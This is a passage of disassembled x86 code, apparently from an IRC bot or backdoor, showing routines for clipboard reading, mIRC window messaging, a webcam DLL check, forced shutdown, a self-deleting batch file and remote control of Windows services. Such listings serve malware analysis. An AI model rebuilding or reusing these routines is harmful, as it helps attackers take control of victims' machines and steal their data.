lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40842D
add esp, 20h
loc_4097CF: ; CODE XREF: sub_409517+28A�j
cmp dword_44B7E8, esi
jz short loc_409803
push dword_44B7EC
lea eax, [ebp+var_200]
push offset aAvicap32_dllFa ; "Avicap32.dll failed. <%d>"
push eax
call sub_418D70
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40842D
add esp, 20h
loc_409803: ; CODE XREF: sub_409517+2BE�j
lea eax, [ebp+var_200]
push offset aMainDllTestCom ; "[MAIN]: DLL test complete."
push eax
call sub_418D70
cmp [ebp+arg_C], esi
pop ecx
pop ecx
jnz short loc_409830
push esi
lea eax, [ebp+var_200]
push edi
push eax
push ebx
push [ebp+arg_0]
call sub_40842D
add esp, 14h
loc_409830: ; CODE XREF: sub_409517+302�j
lea eax, [ebp+var_200]
push eax
call sub_4035E1
pop ecx
pop edi
pop esi
pop ebx
leave
retn
sub_409517 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409842 proc near ; CODE XREF: sub_40C50A+BD5�p
; sub_40C50A+C09�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push esi
push edi
mov edi, [ebp+arg_0]
xor esi, esi
cmp edi, esi
jz short loc_4098CD
mov eax, [ebp+arg_4]
cmp eax, esi
jz short loc_4098CD
cmp [ebp+arg_8], esi
jz short loc_4098CD
cmp byte ptr [eax], 0
jz short loc_4098CD
push ebx
push edi
call sub_4311B0
mov ebx, eax
pop ecx
test ebx, ebx
jz short loc_4098C8
push [ebp+arg_4]
push edi
call sub_419AB0
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_4098C1
sub eax, edi
push eax
push edi
push ebx
call sub_4191A0
push [ebp+arg_8]
mov eax, ebx
sub eax, edi
and byte ptr [eax+esi], 0
call sub_418E70
push eax
push [ebp+arg_8]
push ebx
call sub_419040
push [ebp+arg_4]
call sub_418E70
add eax, esi
push eax
push ebx
call sub_419FB0
push ebx
push edi
call sub_419FA0
add esp, 30h
mov esi, edi
loc_4098C1: ; CODE XREF: sub_409842+3C�j
push ebx
call sub_417480
pop ecx
loc_4098C8: ; CODE XREF: sub_409842+2B�j
mov eax, esi
pop ebx
jmp short loc_4098CF
; ---------------------------------------------------------------------------
loc_4098CD: ; CODE XREF: sub_409842+C�j
; sub_409842+13�j ...
xor eax, eax
loc_4098CF: ; CODE XREF: sub_409842+89�j
pop edi
pop esi
pop ebp
retn
sub_409842 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4098D3 proc near ; CODE XREF: sub_40823C+F4�p
; sub_40C392+E9�p
var_7D0 = dword ptr -7D0h
var_7CC = byte ptr -7CCh
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 7D0h
push ebx
push esi
push 7D0h
lea eax, [ebp+var_7D0]
push 0
push eax
call sub_4189A0
mov esi, [ebp+arg_0]
push esi
call sub_418E70
add esp, 10h
push 1
pop ebx
cmp eax, ebx
jge short loc_409909
or eax, 0FFFFFFFFh
jmp short loc_40997C
; ---------------------------------------------------------------------------
loc_409909: ; CODE XREF: sub_4098D3+2F�j
xor ecx, ecx
mov [ebp+var_7D0], esi
test eax, eax
jle short loc_40992B
loc_409915: ; CODE XREF: sub_4098D3+56�j
mov dl, [ecx+esi]
cmp dl, 0Ah
jz short loc_409922
cmp dl, 0Dh
jnz short loc_409926
loc_409922: ; CODE XREF: sub_4098D3+48�j
and byte ptr [ecx+esi], 0
loc_409926: ; CODE XREF: sub_4098D3+4D�j
inc ecx
cmp ecx, eax
jl short loc_409915
loc_40992B: ; CODE XREF: sub_4098D3+40�j
xor edx, edx
push edi
test eax, eax
jle short loc_40995C
lea edi, [ebp+var_7CC]
loc_409938: ; CODE XREF: sub_4098D3+87�j
cmp byte ptr [edx+esi], 0
jnz short loc_409957
cmp byte ptr [edx+esi+1], 0
lea ecx, [edx+esi+1]
jz short loc_409957
cmp ebx, 1F4h
jge short loc_40995C
mov [edi], ecx
inc ebx
add edi, 4
loc_409957: ; CODE XREF: sub_4098D3+69�j
; sub_4098D3+74�j
inc edx
cmp edx, eax
jl short loc_409938
loc_40995C: ; CODE XREF: sub_4098D3+5D�j
; sub_4098D3+7C�j
cmp [ebp+arg_4], 0
pop edi
jz short loc_40997A
lea eax, [ebp+var_7D0]
push 7D0h
push eax
push [ebp+arg_4]
call sub_418A00
add esp, 0Ch
loc_40997A: ; CODE XREF: sub_4098D3+8E�j
mov eax, ebx
loc_40997C: ; CODE XREF: sub_4098D3+34�j
pop esi
pop ebx
leave
retn
sub_4098D3 endp
; =============== S U B R O U T I N E =======================================
sub_409980 proc near ; CODE XREF: sub_4099DA+33�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_4]
push esi
push edi
mov edi, [esp+8+arg_8]
mov ecx, 1F4h
xor esi, esi
rep stosd
lea edi, [eax-1]
test edi, edi
jl short loc_4099B9
push ebx
mov ebx, edi
loc_40999D: ; CODE XREF: sub_409980+36�j
mov eax, [esp+0Ch+arg_0]
mov al, [esi+eax]
push eax
call sub_4099BC
pop ecx
inc esi
mov ecx, [esp+0Ch+arg_8]
mov [ecx+eax*4], ebx
dec ebx
cmp esi, edi
jle short loc_40999D
pop ebx
loc_4099B9: ; CODE XREF: sub_409980+18�j
pop edi
pop esi
retn
sub_409980 endp
; =============== S U B R O U T I N E =======================================
sub_4099BC proc near ; CODE XREF: sub_409980+25�p
; sub_4099DA+6B�p
arg_0 = byte ptr 4
movsx eax, [esp+arg_0]
push eax
call sub_41AE40
cmp al, 61h
pop ecx
jl short loc_4099D7
cmp al, 7Ah
jg short loc_4099D7
movsx eax, al
sub eax, 60h
retn
; ---------------------------------------------------------------------------
loc_4099D7: ; CODE XREF: sub_4099BC+E�j
; sub_4099BC+12�j
xor eax, eax
retn
sub_4099BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4099DA proc near ; CODE XREF: .text:004036EA�p
; sub_40375F+10�p ...
var_100C = dword ptr -100Ch
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
mov eax, 100Ch
call sub_418D40
push ebx
push esi
push edi
push [ebp+arg_0]
call sub_418E70
push [ebp+arg_4]
mov [ebp+var_4], eax
call sub_418E70
mov esi, eax
lea eax, [ebp+var_100C]
push eax
push esi
push [ebp+arg_4]
mov [ebp+var_C], esi
call sub_409980
add esp, 14h
dec esi
mov edi, esi
loc_409A18: ; CODE XREF: sub_4099DA+B6�j
test esi, esi
jle short loc_409A96
mov eax, [ebp+arg_4]
movsx eax, byte ptr [esi+eax]
push eax
call sub_41AE40
mov ebx, eax
mov eax, [ebp+arg_0]
movsx eax, byte ptr [edi+eax]
push eax
call sub_41AE40
pop ecx
cmp eax, ebx
pop ecx
jz short loc_409A8E
loc_409A3E: ; CODE XREF: sub_4099DA+B2�j
mov ebx, [ebp+arg_0]
mov al, [edi+ebx]
push eax
call sub_4099BC
mov edx, [ebp+var_C]
mov eax, [ebp+eax*4+var_100C]
pop ecx
mov ecx, edx
sub ecx, esi
cmp ecx, eax
jle short loc_409A5F
mov eax, ecx
loc_409A5F: ; CODE XREF: sub_4099DA+81�j
add edi, eax
cmp edi, [ebp+var_4]
jge short loc_409A92
mov eax, [ebp+arg_4]
lea esi, [edx-1]
movsx eax, byte ptr [esi+eax]
push eax
call sub_41AE40
mov edx, eax
movsx eax, byte ptr [edi+ebx]
push eax
mov [ebp+var_8], edx
call sub_41AE40
pop ecx
pop ecx
mov ecx, [ebp+var_8]
cmp eax, ecx
jnz short loc_409A3E
loc_409A8E: ; CODE XREF: sub_4099DA+62�j
dec edi
dec esi
jmp short loc_409A18
; ---------------------------------------------------------------------------
loc_409A92: ; CODE XREF: sub_4099DA+8A�j
xor eax, eax
jmp short loc_409A9B
; ---------------------------------------------------------------------------
loc_409A96: ; CODE XREF: sub_4099DA+40�j
mov eax, [ebp+arg_0]
add eax, edi
loc_409A9B: ; CODE XREF: sub_4099DA+BA�j
pop edi
pop esi
pop ebx
leave
retn
sub_4099DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409AA0 proc near ; CODE XREF: sub_40C50A+3C8D�p
; sub_40C50A+4AEC�p
var_100 = byte ptr -100h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 100h
push esi
call ds:dword_4942F0
mov esi, eax
push 0
lea eax, [ebp+var_100]
push 100h
push eax
push 400h
push esi
push 0
push 1200h
call ds:dword_494384
lea eax, [ebp+var_100]
loc_409AD9: ; CODE XREF: sub_409AA0+46�j
mov cl, [eax]
cmp cl, 1Fh
jg short loc_409AE5
cmp cl, 9
jnz short loc_409AE8
loc_409AE5: ; CODE XREF: sub_409AA0+3E�j
inc eax
jmp short loc_409AD9
; ---------------------------------------------------------------------------
loc_409AE8: ; CODE XREF: sub_409AA0+43�j
; sub_409AA0+5B�j ...
and byte ptr [eax], 0
dec eax
lea ecx, [ebp+var_100]
cmp eax, ecx
jb short loc_409B02
mov cl, [eax]
cmp cl, 2Eh
jz short loc_409AE8
cmp cl, 21h
jl short loc_409AE8
loc_409B02: ; CODE XREF: sub_409AA0+54�j
lea eax, [ebp+var_100]
push esi
push eax
mov esi, offset dword_44B7F0
push [ebp+arg_0]
push offset aSErrorSD_ ; "%s Error: %s <%d>."
push 200h
push esi
call sub_418EF0
add esp, 18h
mov eax, esi
pop esi
leave
retn
sub_409AA0 endp
; =============== S U B R O U T I N E =======================================
sub_409B2A proc near ; CODE XREF: sub_40C50A+573B�p
push esi
push 0
call dword_44B690 ; OpenClipboard
test eax, eax
jz short loc_409B61
push 1
call dword_44B6B0 ; GetClipboardData
mov esi, eax
test esi, esi
jz short loc_409B61
push edi
push esi
call ds:dword_49438C
push esi
mov edi, eax
call ds:dword_494388
call dword_44B714 ; CloseClipboard
mov eax, edi
pop edi
pop esi
retn
; ---------------------------------------------------------------------------
loc_409B61: ; CODE XREF: sub_409B2A+B�j
; sub_409B2A+19�j
xor eax, eax
pop esi
retn
sub_409B2A endp
; =============== S U B R O U T I N E =======================================
sub_409B65 proc near ; CODE XREF: sub_40C50A+48DC�p
arg_0 = dword ptr 4
push ebp
push esi
xor esi, esi
push esi
push offset aMirc_0 ; "mIRC"
call dword_44B6CC ; FindWindowA
mov ebp, eax
cmp ebp, esi
jz short loc_409BE5
push ebx
push edi
push offset aMirc_1 ; "mIRC"
push 1000h
push esi
push 4
push esi
push 0FFFFFFFFh
call ds:dword_494398
push esi
push esi
mov edi, eax
push esi
push 0F001Fh
push edi
call ds:dword_494394
push [esp+10h+arg_0]
mov ebx, eax
push ebx
call sub_418D70
pop ecx
pop ecx
push esi
push 1
push 4C8h
push ebp
call dword_44B71C ; SendMessageA
push esi
push 1
push 4C9h
push ebp
call dword_44B71C ; SendMessageA
push ebx
call ds:dword_494390
push edi
call ds:dword_4942E0
push 1
pop eax
pop edi
pop ebx
jmp short loc_409BE7
; ---------------------------------------------------------------------------
loc_409BE5: ; CODE XREF: sub_409B65+14�j
xor eax, eax
loc_409BE7: ; CODE XREF: sub_409B65+7E�j
pop esi
pop ebp
retn
sub_409B65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409BEA proc near ; CODE XREF: sub_40BBCB+212�p
var_11C = byte ptr -11Ch
var_18 = byte ptr -18h
var_10 = byte ptr -10h
var_8 = byte ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 11Ch
push ebx
push esi
xor esi, esi
push edi
lea eax, [ebp+var_11C]
push esi
push eax
push 104h
push esi
push offset aExplorer_exe ; "explorer.exe"
push esi
call dword_44B77C ; SearchPathA
test eax, eax
jz short loc_409C89
mov edi, 80h
push esi
push edi
push 3
push esi
mov esi, ds:dword_4942EC
push 1
lea eax, [ebp+var_11C]
push 80000000h
push eax
call esi
mov ebx, eax
cmp ebx, 0FFFFFFFFh
jz short loc_409C89
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push ebx
call ds:dword_4943A0
push ebx
mov ebx, ds:dword_4942E0
call ebx
push 0
push edi
push 3
push 0
push 2
push 40000000h
push [ebp+arg_0]
call esi
mov esi, eax
cmp esi, 0FFFFFFFFh
jz short loc_409C89
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_49439C
push esi
call ebx
loc_409C89: ; CODE XREF: sub_409BEA+2A�j
; sub_409BEA+51�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_409BEA endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 454h
push esi
xor esi, esi
push 10h
lea eax, [ebp-10h]
push esi
push eax
call sub_4189A0
push 44h
lea eax, [ebp-54h]
push esi
push eax
call sub_4189A0
push dword ptr [ebp+0Ch]
lea eax, [ebp-454h]
mov dword ptr [ebp-54h], 44h
mov dword ptr [ebp-28h], 1
push dword ptr [ebp+8]
mov [ebp-24h], si
push offset aSS_7 ; "%s %s"
push 400h
push eax
call sub_418EF0
add esp, 2Ch
lea eax, [ebp-10h]
push eax
lea eax, [ebp-54h]
push eax
push esi
push esi
push 28h
push esi
push esi
lea eax, [ebp-454h]
push esi
push eax
push dword ptr [ebp+8]
call ds:dword_494330
neg eax
sbb eax, eax
pop esi
and eax, [ebp-8]
leave
retn
; =============== S U B R O U T I N E =======================================
sub_409D0C proc near ; CODE XREF: sub_40C50A+132E�p
push 1
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
call sub_40B487
pop ecx
pop ecx
push 50005h
push 6
call dword_44B608 ; ExitWindowsEx
neg eax
sbb eax, eax
neg eax
retn
sub_409D0C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409D2E proc near ; CODE XREF: sub_405084+472�p
; sub_40C50A+59C6�p
var_764 = byte ptr -764h
var_364 = byte ptr -364h
var_260 = byte ptr -260h
var_15C = byte ptr -15Ch
var_58 = dword ptr -58h
var_4C = dword ptr -4Ch
var_2C = dword ptr -2Ch
var_28 = word ptr -28h
var_14 = byte ptr -14h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 764h
push esi
xor esi, esi
cmp dword_43E1B4, esi
push edi
jz short loc_409D52
cmp dword_44B790, esi
jnz short loc_409D52
push esi
call sub_4038C0
pop ecx
loc_409D52: ; CODE XREF: sub_409D2E+13�j
; sub_409D2E+1B�j
call sub_4163B4
lea eax, [ebp+var_764]
push eax
push 400h
call ds:dword_4943AC
lea eax, [ebp+var_764]
push eax
lea eax, [ebp+var_260]
push offset aSdel_bat ; "%sdel.bat"
push eax
call sub_418D70
add esp, 0Ch
lea eax, [ebp+var_260]
push esi
push esi
push 2
push esi
push esi
push 40000000h
push eax
call ds:dword_4942EC
mov edi, eax
cmp edi, esi
jbe loc_409EB2
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset a@echoOffRepeat ; "@echo off\r\n:repeat\r\ndel \"%%1\"\r\nif exist"...
push eax
call sub_418D70
add esp, 0Ch
lea eax, [ebp+var_4]
push esi
push eax
lea eax, [ebp+var_764]
push eax
call sub_418E70
pop ecx
push eax
lea eax, [ebp+var_764]
push eax
push edi
call ds:dword_4942E4
push edi
call ds:dword_4942E0
push 10h
lea eax, [ebp+var_14]
push esi
push eax
call sub_4189A0
push 44h
lea eax, [ebp+var_58]
pop edi
push edi
push esi
push eax
call sub_4189A0
add esp, 18h
mov [ebp+var_58], edi
mov edi, 104h
lea eax, [ebp+var_15C]
push edi
push eax
push esi
mov [ebp+var_4C], offset dword_44B9F4
mov [ebp+var_2C], 1
mov [ebp+var_28], si
call ds:dword_494380
push eax
call ds:dword_4942F8
lea eax, [ebp+var_15C]
push eax
call ds:dword_49437C
cmp eax, 0FFFFFFFFh
jz short loc_409E5A
lea eax, [ebp+var_15C]
push 80h
push eax
call ds:dword_4943A8
loc_409E5A: ; CODE XREF: sub_409D2E+118�j
lea eax, [ebp+var_15C]
push eax
lea eax, [ebp+var_260]
push eax
lea eax, [ebp+var_764]
push offset aComspecCSS ; "%%comspec%% /c %s %s"
push eax
call sub_418D70
add esp, 10h
lea eax, [ebp+var_364]
push edi
push eax
lea eax, [ebp+var_764]
push eax
call ds:dword_4943A4
lea eax, [ebp+var_14]
push eax
lea eax, [ebp+var_58]
push eax
push esi
push esi
push 4008h
push 1
push esi
lea eax, [ebp+var_364]
push esi
push eax
push esi
call ds:dword_494330
loc_409EB2: ; CODE XREF: sub_409D2E+72�j
pop edi
pop esi
leave
retn
sub_409D2E endp
; =============== S U B R O U T I N E =======================================
sub_409EB6 proc near ; CODE XREF: sub_40C50A+1FE1�p
; sub_40C50A+2042�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
test edi, edi
jz short loc_409F1B
lea esi, [eax+eax*2]
push 0
shl esi, 2
push 0
push dword_43A4D8[esi]
push edi
push eax
call sub_409F3D
add esp, 14h
test eax, eax
jnz short loc_409EFE
push edi
push off_43A4D4[esi]
mov esi, offset dword_44C0B8
push offset aNetSServiceS_ ; "[NET]: %s service: '%s'."
push esi
call sub_418D70
add esp, 10h
jmp short loc_409F38
; ---------------------------------------------------------------------------
loc_409EFE: ; CODE XREF: sub_409EB6+2A�j
push eax
call sub_409FDF
push eax
push edi
mov esi, offset dword_44C0B8
push offset aNetErrorWithSe ; "[NET]: Error with service: '%s'. %s"
push esi
call sub_418D70
add esp, 14h
jmp short loc_409F38
; ---------------------------------------------------------------------------
loc_409F1B: ; CODE XREF: sub_409EB6+C�j
lea eax, [eax+eax*2]
mov esi, offset dword_44C0B8
push off_43A4D0[eax*4]
push offset aNetSNoServiceS ; "[NET]: %s: No service specified."
push esi
call sub_418D70
add esp, 0Ch
loc_409F38: ; CODE XREF: sub_409EB6+46�j
; sub_409EB6+63�j
mov eax, esi
pop edi
pop esi
retn
sub_409EB6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409F3D proc near ; CODE XREF: sub_409EB6+20�p
var_1C = byte ptr -1Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 1Ch
push ebx
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
call dword_44B6B4 ; OpenSCManagerA
mov edi, eax
cmp edi, ebx
jnz short loc_409F64
call ds:dword_4942F0
mov ebx, eax
jmp short loc_409FD9
; ---------------------------------------------------------------------------
loc_409F64: ; CODE XREF: sub_409F3D+1B�j
push esi
push 0F01FFh
push [ebp+arg_4]
push edi
call dword_44B5A8 ; OpenServiceA
mov esi, eax
cmp esi, ebx
jnz short loc_409F84
call ds:dword_4942F0
mov ebx, eax
jmp short loc_409FD1
; ---------------------------------------------------------------------------
loc_409F84: ; CODE XREF: sub_409F3D+3B�j
mov eax, [ebp+arg_0]
cmp eax, 1
jz short loc_409FB7
cmp eax, 3
jz short loc_409FA8
jle short loc_409FCA
cmp eax, 6
jg short loc_409FCA
lea eax, [ebp+var_1C]
push eax
push [ebp+arg_8]
push esi
call dword_44B610 ; ControlService
jmp short loc_409FBE
; ---------------------------------------------------------------------------
loc_409FA8: ; CODE XREF: sub_409F3D+52�j
push [ebp+arg_10]
push [ebp+arg_C]
push esi
call dword_44B5B0 ; StartServiceA
jmp short loc_409FBE
; ---------------------------------------------------------------------------
loc_409FB7: ; CODE XREF: sub_409F3D+4D�j
push esi
call dword_44B614 ; DeleteService
loc_409FBE: ; CODE XREF: sub_409F3D+69�j
; sub_409F3D+78�j
test eax, eax
jnz short loc_409FCA
call ds:dword_4942F0
mov ebx, eax
loc_409FCA: ; CODE XREF: sub_409F3D+54�j
; sub_409F3D+59�j ...
push esi
call dword_44B5C4 ; CloseServiceHandle
loc_409FD1: ; CODE XREF: sub_409F3D+45�j
push edi
call dword_44B5C4 ; CloseServiceHandle
pop esi
loc_409FD9: ; CODE XREF: sub_409F3D+25�j
mov eax, ebx
pop edi
pop ebx
leave
retn
sub_409F3D endp
; =============== S U B R O U T I N E =======================================
sub_409FDF proc near ; CODE XREF: sub_409EB6+49�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov ecx, 420h
cmp eax, ecx
ja loc_40A094
jz loc_40A08D
add ecx, 0FFFFFFFBh
cmp eax, ecx
ja short loc_40A057
jz short loc_40A04D
mov ecx, eax
sub ecx, 3
jz short loc_40A043
dec ecx
dec ecx
jz short loc_40A039
dec ecx
jz short loc_40A02F
sub ecx, 51h
jz short loc_40A025
sub ecx, 24h
jnz loc_40A10A ; default
; jumptable 0040A0B1 cases 1,5,6,8,9,12,13,15,16
push offset aTheSpecifiedSe ; "The specified service name is invalid."
jmp loc_40A0FC
; ---------------------------------------------------------------------------
loc_40A025: ; CODE XREF: sub_409FDF+31�j
push offset aTheRequestedCo ; "The requested control code is undefined"...
jmp loc_40A0FC
; ---------------------------------------------------------------------------
loc_40A02F: ; CODE XREF: sub_409FDF+2C�j
push offset aTheHandleIsInv ; "The handle is invalid."
jmp loc_40A0FC
; ---------------------------------------------------------------------------
loc_40A039: ; CODE XREF: sub_409FDF+29�j
push offset aTheHandleDoesN ; "The handle does not have the required a"...
jmp loc_40A0FC
; ---------------------------------------------------------------------------
loc_40A043: ; CODE XREF: sub_409FDF+25�j
push offset aTheServiceBina ; "The service binary file could not be fo"...
jmp loc_40A0FC
; ---------------------------------------------------------------------------
loc_40A04D: ; CODE XREF: sub_409FDF+1E�j
push offset aTheServiceCann ; "The service cannot be stopped because o"...
jmp loc_40A0FC
; ---------------------------------------------------------------------------
loc_40A057: ; CODE XREF: sub_409FDF+1C�j
mov ecx, eax
sub ecx, 41Ch
jz short loc_40A086
dec ecx
jz short loc_40A07F
dec ecx
jz short loc_40A078
dec ecx
jnz loc_40A10A ; default
; jumptable 0040A0B1 cases 1,5,6,8,9,12,13,15,16
push offset aTheDatabaseIsL ; "The database is locked."
jmp loc_40A0FC
; ---------------------------------------------------------------------------
loc_40A078: ; CODE XREF: sub_409FDF+86�j
push offset aAThreadCouldNo ; "A thread could not be created for the s"...
jmp short loc_40A0FC
; ---------------------------------------------------------------------------
loc_40A07F: ; CODE XREF: sub_409FDF+83�j
push offset aTheProcessForT ; "The process for the service was started"...
jmp short loc_40A0FC
; ---------------------------------------------------------------------------
loc_40A086: ; CODE XREF: sub_409FDF+80�j
push offset aTheRequested_0 ; "The requested control code is not valid"...
jmp short loc_40A0FC
; ---------------------------------------------------------------------------
loc_40A08D: ; CODE XREF: sub_409FDF+11�j
push offset aAnInstanceOfTh ; "An instance of the service is already r"...
jmp short loc_40A0FC
; ---------------------------------------------------------------------------
loc_40A094: ; CODE XREF: sub_409FDF+B�j
mov ecx, 45Bh
cmp eax, ecx
ja short loc_40A10A ; default
; jumptable 0040A0B1 cases 1,5,6,8,9,12,13,15,16
jz short loc_40A0F7
lea ecx, [eax-422h]
cmp ecx, 11h ; switch 18 cases
ja short loc_40A10A ; default
; jumptable 0040A0B1 cases 1,5,6,8,9,12,13,15,16
movzx ecx, ds:byte_40A14B[ecx]
jmp ds:off_40A123[ecx*4] ; switch jump
loc_40A0B8: ; DATA XREF: .text:off_40A123�o
push offset aTheSpecifiedDa ; jumptable 0040A0B1 case 7
jmp short loc_40A0FC
; ---------------------------------------------------------------------------
loc_40A0BF: ; CODE XREF: sub_409FDF+D2�j
; DATA XREF: .text:off_40A123�o
push offset aTheServiceDepe ; jumptable 0040A0B1 case 17
jmp short loc_40A0FC
; ---------------------------------------------------------------------------
loc_40A0C6: ; CODE XREF: sub_409FDF+D2�j
; DATA XREF: .text:off_40A123�o
push offset aTheServiceDe_0 ; jumptable 0040A0B1 case 10
jmp short loc_40A0FC
; ---------------------------------------------------------------------------
loc_40A0CD: ; CODE XREF: sub_409FDF+D2�j
; DATA XREF: .text:off_40A123�o
push offset aTheServiceHasB ; jumptable 0040A0B1 case 0
jmp short loc_40A0FC
; ---------------------------------------------------------------------------
loc_40A0D4: ; CODE XREF: sub_409FDF+D2�j
; DATA XREF: .text:off_40A123�o
push offset aTheSpecified_0 ; jumptable 0040A0B1 case 2
jmp short loc_40A0FC
; ---------------------------------------------------------------------------
loc_40A0DB: ; CODE XREF: sub_409FDF+D2�j
; DATA XREF: .text:off_40A123�o
push offset aTheServiceCoul ; jumptable 0040A0B1 case 11
jmp short loc_40A0FC
; ---------------------------------------------------------------------------
loc_40A0E2: ; CODE XREF: sub_409FDF+D2�j
; DATA XREF: .text:off_40A123�o
push offset aTheServiceHa_0 ; jumptable 0040A0B1 case 14
jmp short loc_40A0FC
; ---------------------------------------------------------------------------
loc_40A0E9: ; CODE XREF: sub_409FDF+D2�j
; DATA XREF: .text:off_40A123�o
push offset aTheRequested_1 ; jumptable 0040A0B1 case 3
jmp short loc_40A0FC
; ---------------------------------------------------------------------------
loc_40A0F0: ; CODE XREF: sub_409FDF+D2�j
; DATA XREF: .text:off_40A123�o
push offset aTheServiceHasN ; jumptable 0040A0B1 case 4
jmp short loc_40A0FC
; ---------------------------------------------------------------------------
loc_40A0F7: ; CODE XREF: sub_409FDF+BE�j
push offset aTheSystemIsShu ; "The system is shutting down."
loc_40A0FC: ; CODE XREF: sub_409FDF+41�j
; sub_409FDF+4B�j ...
push offset dword_44B9F8
call sub_418D70
pop ecx
pop ecx
jmp short loc_40A11D
; ---------------------------------------------------------------------------
loc_40A10A: ; CODE XREF: sub_409FDF+36�j
; sub_409FDF+89�j ...
push eax ; default
; jumptable 0040A0B1 cases 1,5,6,8,9,12,13,15,16
push offset aAnUnknownErr_0 ; "An unknown error occurred: <%ld>"
push offset dword_44B9F8
call sub_418D70
add esp, 0Ch
loc_40A11D: ; CODE XREF: sub_409FDF+129�j
mov eax, offset dword_44B9F8
retn
sub_409FDF endp
; ---------------------------------------------------------------------------
off_40A123 dd offset loc_40A0CD ; DATA XREF: sub_409FDF+D2�r
dd offset loc_40A0D4 ; jump table for switch statement
dd offset loc_40A0E9
dd offset loc_40A0F0
dd offset loc_40A0B8
dd offset loc_40A0C6
dd offset loc_40A0DB
dd offset loc_40A0E2
dd offset loc_40A0BF
dd offset loc_40A10A
byte_40A14B db 0, 9, 1, 2 ; DATA XREF: sub_409FDF+CB�r
db 3, 9, 9, 4 ; indirect table for switch statement
db 9, 9, 5, 6
db 9, 9, 7, 9
db 9, 8
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A15D proc near ; CODE XREF: sub_40C50A+200C�p
var_38C = byte ptr -38Ch
var_18C = byte ptr -18Ch
var_188 = byte ptr -188h
var_24 = byte ptr -24h
var_20 = byte ptr -20h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 38Ch
push ebx
push esi
push edi
xor ebx, ebx
push 0F003Fh
push ebx
push ebx
mov [ebp+var_8], ebx
call dword_44B6B4 ; OpenSCManagerA
push ebx
mov [ebp+var_C], eax
push [ebp+arg_8]
push offset aTheFollowingWi ; "The following Windows services are regi"...
push [ebp+arg_4]
push [ebp+arg_0]
call sub_40842D
add esp, 14h
loc_40A195: ; CODE XREF: sub_40A15D+120�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_18C]
push 168h
push eax
push 3
push 30h
push [ebp+var_C]
call dword_44B680 ; EnumServicesStatusA
test eax, eax
jnz short loc_40A1CF
call ds:dword_4942F0
cmp eax, 0EAh
jnz loc_40A283
loc_40A1CF: ; CODE XREF: sub_40A15D+5F�j
xor edi, edi
cmp [ebp+var_4], ebx
jle loc_40A27A
lea esi, [ebp+var_188]
loc_40A1E0: ; CODE XREF: sub_40A15D+117�j
mov eax, [esi+8]
dec eax
jz short loc_40A229
dec eax
jz short loc_40A222
dec eax
jz short loc_40A21B
dec eax
jz short loc_40A214
dec eax
jz short loc_40A20D
dec eax
jz short loc_40A206
dec eax
jz short loc_40A1FF
push offset aUnknown_0 ; " Unknown"
jmp short loc_40A22E
; ---------------------------------------------------------------------------
loc_40A1FF: ; CODE XREF: sub_40A15D+99�j
push offset aPaused ; " Paused"
jmp short loc_40A22E
; ---------------------------------------------------------------------------
loc_40A206: ; CODE XREF: sub_40A15D+96�j
push offset aPausing ; " Pausing"
jmp short loc_40A22E
; ---------------------------------------------------------------------------
loc_40A20D: ; CODE XREF: sub_40A15D+93�j
push offset aContinuing ; " Continuing"
jmp short loc_40A22E
; ---------------------------------------------------------------------------
loc_40A214: ; CODE XREF: sub_40A15D+90�j
push offset aRunning ; " Running"
jmp short loc_40A22E
; ---------------------------------------------------------------------------
loc_40A21B: ; CODE XREF: sub_40A15D+8D�j
push offset aStoping ; " Stoping"
jmp short loc_40A22E
; ---------------------------------------------------------------------------
loc_40A222: ; CODE XREF: sub_40A15D+8A�j
push offset aStarting ; " Starting"
jmp short loc_40A22E
; ---------------------------------------------------------------------------
loc_40A229: ; CODE XREF: sub_40A15D+87�j
push offset aStopped ; " Stopped"
loc_40A22E: ; CODE XREF: sub_40A15D+A0�j
; sub_40A15D+A7�j ...
lea eax, [ebp+var_20]
push eax
call sub_418D70
pop ecx
lea eax, [ebp+var_20]
pop ecx
